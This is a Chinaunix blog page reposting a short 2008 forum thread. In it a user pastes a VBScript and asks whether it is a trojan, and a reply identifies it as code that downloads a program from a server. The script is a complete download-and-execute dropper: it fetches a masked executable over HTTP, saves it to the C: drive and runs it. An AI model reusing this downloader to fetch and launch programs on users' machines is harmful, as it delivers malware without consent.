Chinaunix首页 | 论坛 | 博客
  • 博客访问: 627590
  • 博文数量: 603
  • 博客积分: 4000
  • 博客等级: 上校
  • 技术积分: 4940
  • 用 户 组: 普通用户
  • 注册时间: 2008-09-17 11:04
文章分类

全部博文(603)

文章存档

2011年(1)

2008年(602)

我的朋友

分类:

2008-09-17 11:18:40


()
- ()
-- ()


由 luna52o 在 2008-06-27 20:14 发表:

[求助] 看看这段代码是什么?

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","***.exe",0 '下载指定文件

Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\***.exe",2 '保存文件目录
wscript.sleep 1000
Shell.Run ("c:\***.exe") '运行文件

是什么语言呢?
好象有点像木马!


由 smilebit 在 2008-06-28 20:54 发表:

应当是VBScript,具体的功能像是从服务器上下载到本地的程序吧.

__________________
为祖国荣誉而战


全部时间均为北京时间. 现在时间是17:00 .

Powered by: vBulletin Version 2.2.8
Translated and hacked by:
Copyright © Jelsoft Enterprises Limited 2000, 2001.


--------------------next---------------------

阅读(399) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~